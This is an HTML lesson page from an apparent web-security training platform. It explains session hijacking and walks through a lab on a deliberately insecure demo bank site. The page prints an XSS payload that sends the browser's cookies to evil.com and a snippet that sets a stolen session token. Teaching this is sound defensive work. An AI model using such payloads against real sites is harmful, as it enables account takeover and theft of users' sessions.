<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
        integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" href="../user-portal/common.css">
    <link rel="stylesheet" href="common.css">

    <title>Web-Vulnerability Platform</title>
</head>

<body onload="checkAuthentication()">
    <!-- Menu bar  to copied over files -->
    <nav class="navbar navbar-expand-md navbar-dark fixed-top bg-dark MenuBar">
        <a class=" navbar-brand" href="../index.html">Home</a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse"
            aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarCollapse">
            <ul class="navbar-nav mr-auto">
                <li class="nav-item">
                    <a class="nav-link" href="../pages/sql_injection.html">SQL Injection <span class="sr-only">(current)</span></a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#">Cross-Site Vulnerabilities
                        <span class="caret"></span></a>
                    <div class="dropdown-menu">
                        <a href="../pages/xss.html" class="dropdown-item">1. Cross-Site Scripting</a>
                        <a href="../pages/csrf.html" class="dropdown-item">2. Cross-Site Request Forgery</a>
                    </div>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="../pages/insecure_direct_object_references.html">Insecure Direct Object References</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#">Cache Vulnerabilities
                        <span class="caret"></span></a>
                    <div class="dropdown-menu">
                        <a href="../pages/web_cache_deception.html" class="dropdown-item">1. Web Cache Deception</a>
                        <a href="../pages/web_cache_poisoning.html" class="dropdown-item">2. Web Cache Poisoning</a>
                    </div>
                </li>
                <li class="nav-item active">
                    <a class="nav-link" href="../pages/session_hijacking.html">Session Hijacking</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="../pages/oauth2.html">OAuth2 Vulnerabilities</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="../prerender">Cookie Manipulation</a>
                </li>
            </ul>
            <a class="btn btn-primary" href="../user-portal/index.html">Go to User Portal</a>
            <div id="reset-success" class="alert alert-success hidden" role="alert">Successful reset</div>
            <div id="reset-failure" class="alert alert-danger hidden" role="alert">Failed to reset</div>
            <button class="btn btn-primary ml-2" style="float: left" onclick="reset()">Reset</button>
        </div>
    </nav>

    <main role="main" class="container">
        <h1>Session Hijacking</h1>
        <div class="jumbotron">
            <hr>
            <h3>What</h3>
            <p>
                In order to understand the concept of session hijacking, it is important to first understand what a web
                session exactly is and why it is needed. A web session is a sequence of network HTTP requests and
                responses associated with the same user <cite><a
                        href="https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"
                        target="_blank">[OWASP]</a></cite>.
                Because HTTP is a stateless protocol, in order to introduce the concept of a session, it is required to
                implement session management capabilities that link the authentication and access control modules of a
                web applications. This is done by generating a session ID (or token) for each user. The session ID binds
                the user authentication credentials (in the form of a user session) to the user's HTTP traffic. Once an
                authenticated session has been established, the session ID is temporarily equivalent to the
                strongest authentication method used by the application, such as username and password.
            </p>
            <p>
                If the session ID is somehow obtained by an adversary, they can perform a <strong>session
                    hijacking</strong> attack, where an attacker is able to fully impersonate a victim user in the web
                application. Attackers can perform two types of session hijacking attacks: targeted or generic. In a
                targeted attack, the attacker's goal is to impersonate a specific web application user, while for
                generic attacks, the attacker's goal is to impersonate any valid or legitimate user of the web
                application.
            </p>
            <hr>
            <h3 id="how">How</h3>
            <p>
                Multiple mechanisms are available in HTTP to maintain session state within web applications, such
                as cookies, URL parameters and body arguments on POST requests (i.e. hidden form fields in HTML forms).
                By far the most prevalent of these mechanism is using cookies to keep track of the session ID. As such
                we will focus on session hijacking by obtaining this session ID from the cookies set in the victim's
                browser.
            </p>
            <p>
                There are multiple ways in which the attacker can obtain the victim's cookies, and thus the victim's
                session ID. The attacker can use a "Session side jacking" attack, where they either monitor
                traffic on a public network, or force the victim to connect to an access point controlled by the
                attacker in a so-called Man-in-the-Middle (MitM) attack. By monitoring traffic of the victim, the
                attacker can intercept session cookies when they are set by the web server, obtaining the
                session ID. This attack is illustrated in <i>Figure 1</i>, below.
            </p>

            <div class="image-container">
                <figure>
                    <img src="../images/session-hijacking-packet-sniffing.svg"
                        alt="Session hijacking using traffic monitoring">
                    <figcaption>Figure 1: Session hijacking using traffic monitoring</figcaption>
                </figure>
            </div>

            <p>
                The attacker can also use a <a href="/pages/xss.html">cross-site scripting (XSS)</a> attack, as
                discussed previously, to execute javascript code that sends the victim's cookies to the attacker. An
                example payload that does exactly this is as follows:
            </p>
            <pre class="prettyprint">
&ltscript&gtnew Image().src = "http://evil.com/steal-cookies?cookies=" + document.cookie;&lt/script&gt
</pre>
            <p>
                This code will add a HTML <code>&ltimg&gt</code> element to the DOM. When this image is loaded a request
                to the source URL is send, compromising the victim's cookies. After obtaining the victim's cookies, the
                attacker can hijack the session by setting the cookies in their own browser - tricking the server into
                wrongfully authorizing the attacker. In <i>Figure 2</i> and <i>Figure 3</i>, example flows of session
                hijacking attacks using both reflected, and stored cross site scripting vulnerabilities are shown.
            </p>

            <div class="image-container">
                <figure>
                    <img src="../images/session-hijacking-reflected-XSS.svg"
                        alt="Session hijacking using reflected XSS">
                    <figcaption>Figure 2: Session hijacking using reflected XSS</figcaption>
                </figure>

                <figure>
                    <img src="../images/session-hijacking-stored-XSS.svg" alt="Session hijacking using stored XSS">
                    <figcaption>Figure 3: Session hijacking using stored XSS</figcaption>
                </figure>
            </div>

            <p>
                A final pitfall that simplifies session hijacking attacks (one that we will be exploiting in the
                example) is not destroying the user session on the server side. When a user clicks on the sign out
                button, or when the cookie expires, the application is supposed to destroy all the session variables
                that are handled on the server side - invalidating the session ID/token. If the developers just delete
                the cookies on the client side, the session on the server is active indefinitely. This means that when
                an attacker obtains the session ID, they can still access the application even though the user is no
                longer logged in! This way session hijacking attacks can be performed at any time, not just when the
                user session is active.
            </p>
            <hr>
            <h3>Consequences</h3>
            <p>
                The consequences of a session hijacking attack are devasting, but quite straightforward. Everything the
                authenticated user can normally do on the vulnerable application, can now be performed by the attacker
                as if they were the user. This means the severity of the consequences depends on the sensitivity of the
                application. A limiting factor is the timeframe in which the user session is active (assuming a proper
                logout implementation and cookies with a reasonable expiry date), since the access to the account is
                revoked if the user session is destroyed.
            </p>
            <hr>
            <h3>Prevention</h3>
            <p>
                To prevent session hijacking multiple steps can be taken. First of all, it is highly recommended to use
                existing session management mechanisms. These are provided by most popular web frameworks, and should be
                preferred over inventing your own session management as they are tried and tested.
            </p>
            <p>
                To specifically prevent the hijacking of cookies containing the session ID, several cookie attributes
                can be set.

                The <code>Secure</code> cookie attribute instructs web browsers to only send the cookie through an
                encrypted HTTPS (SSL/TLS) connection. This session protection mechanism is mandatory to prevent session
                ID stealing through the <a href="#how">aforementioned</a> "Session sidejacking" attacks. It ensures
                that an attacker cannot simply capture the session ID from web browser traffic.
            </p>
            <p>
                The <code>HttpOnly</code> cookie attribute instructs web browsers to not allow any scripts (e.g.
                JavaScript) the ability to access the cookies via the DOM <code>document.cookie</code> object. This
                session ID protection is mandatory to prevent session ID stealing through XSS attacks.
            </p>
            <p>
                A final prevention method is to perform additional user identity verification besides the session ID.
                This means not only assigning cookies, but also keeping track of the user's IP address and other
                application usage patterns.
            </p>
            <hr>
            <h3>Example</h3>
            <p>
                To illustrate session hijacking we will once again <strong>authenticate as one of the users of
                    <i>insecurebanking.com</i></strong>.
                Their credentials can be found in the table on the right. After you have authenticated, a unique
                (session) token is stored in the browser. This token is stored in a cookie, and is attached to each
                request made to the domain of <i>insecurebanking.com</i>. The back-end of the web application then uses
                this token to determine what user is interacting with the web application, i.e. authentication.
            </p>

            <aside>
                <p>
                    For the session ID the back-end uses a <a href="https://en.wikipedia.org/wiki/JSON_Web_Token">JSON
                        Web Token (JWT)</a>. This is an internet standard used to represent claims to be transferred
                    between two parties - in our case the authenticated user and <i>insecurebanking.com</i>. In the case
                    of insecurebanking.com, the server signs the ID of the user using a private key. This
                    enables the server to verify the legitimacy of the token, as well as retrieve the user ID when a
                    request that includes a "token"-cookie is made. <br>
                    There are multiple problems with the way tokens are generated by insecurebanking.com. One such
                    problem is that only the user ID is signed. Because of this, the generated token remains static for
                    each user. Ideally a nonce (number used once) would be added to the user ID such that the generated
                    token is unique each time. Furthermore, as alluded to before, the token is not immediately
                    invalidated when the user signs out. The token expires 1 hour after its creation, but due to the
                    mentioned flaw in the token generation the same token can still be used.
                </p>
            </aside>

            <div class="login-container">
                <div class="box" id="login-form">
                    <div class="alert alert-primary inner-box">
                        <h4 class="box-head">Logging In</h4>
                        <form id="form-signin">
                            <input name="id" type="number" id="signinId" class="form-control" placeholder="User ID"
                                required="">
                            <input name="password" type="password" id="signinPassword" class="form-control"
                                placeholder="Password" required="">
                            <div id="signin-failure"></div>
                            <button onclick="signin(event)"
                                class="btn btn-md btn-primary btn-block btn-submit inline-btn" type="submit">Sign
                                in</button>
                        </form>
                    </div>
                </div>

                <div class="box" id="auth-box" display="none">
                    <div class="alert alert-success inner-box">
                        <h4 class="box-head">Authenticated</h4>
                        <p id="auth-text">You are currently authenticated as</p>
                        <button onclick="signout(event)" class="btn btn-md btn-primary btn-block btn-submit inline-btn"
                            type="submit">Sign out</button>
                    </div>
                </div>

                <div class="box" id="creds">
                    <table class="table table-striped">
                        <thead>
                            <tr>
                                <th scope="col">User ID</th>
                                <th scope="col">Name</th>
                                <th scope="col">Password</th>
                            </tr>
                        </thead>
                        <tbody>
                        <tr>
                            <td>1</td>
                            <td>Alice</td>
                            <td>Mantsje</td>
                        </tr>
                        <td>2</td>
                        <td>Bob</td>
                        <td>Spazzy</td>
                        </tr>
                        </tr>
                        <td>3</td>
                        <td>Carol</td>
                        <td>ccdev</td>
                        </tr>
                        </tr>
                        <td>4</td>
                        <td>Dan</td>
                        <td>dandavis</td>
                        </tr>
                        </tbody>
                    </table>
                </div>
            </div>

            <div id="req-auth-warning" class="alert alert-danger">
                <h6>Please authenticate using the login form before continuing.</h6>
            </div>

            <div id="requires-authentication">
                <p>
                    Now that you have authenticated as one of the users of <i>insecurebanking.com</i>, multiple cookies
                    are set by the website. The names and values of these cookies are shown in the table below.
                </p>
                <table class="table table-striped cookie-table">
                    <thead>
                        <tr>
                            <th scope="col">Name</th>
                            <th scope="col">Value</th>
                        </tr>
                    </thead>
                    <tbody id='cookie-info'>
                    </tbody>
                </table>

                <p>
                    An attacker can steal these cookies in multiple ways, as discussed <a href="#how">above</a>.
                    For simplicity sake we will assume that the attacker has succeeded in stealing the cookie containing
                    the session ID (the token cookie). To simulate this, <strong>find the <i>token</i> cookie and copy
                        the corresponding value.</strong>
                </p>

                <p>
                    Once the attacker possesses the token all they have to do to hijack the user session is set the
                    cookie in their own browser. This can be done using javascript as follows:
                </p>

                <pre class="prettyprint">
document.cookie="token={stolen_token}; path=/"
</pre>
                <p>
                    To continue, <strong>sign out and use the stolen token to hijack the session</strong>. Make sure to
                    copy the token value before proceeding!
                </p>
            </div>

            <div class="steal-cookie-container">
                <p>
                    Now that we have stolen the token value, we will hijack the session of the user.
                    <strong>Fill in the stolen token and press "hijack session"</strong>. This will set the token cookie
                    using the stolen value, as well as refresh the website. If hijacking the session was
                    successful the content will change as if the victim authenticated using their credentials.
                </p>

                <form id="form-steal-cookie">
                    <input name="cookie-name" type="text" id="cookie-name" class="form-control"
                        placeholder="Cookie name" value="token" required="">
                    <input name="cookie-value" type="password" id="cookie-value" class="form-control"
                        placeholder="Stolen cookie value" required="">
                    <div id="steal-cookie-failure"></div>
                    <button class="btn btn-md btn-primary btn-block btn-submit inline-btn" type="submit">Hijack
                        session</button>
                </form>
            </div>
        </div>
    </main>

    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
        integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
        crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
        integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
        crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
        integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
        crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
    <script src="../user-portal/reset.js"></script>
    <script src="session_hijacking.js"></script>
</body>

</html>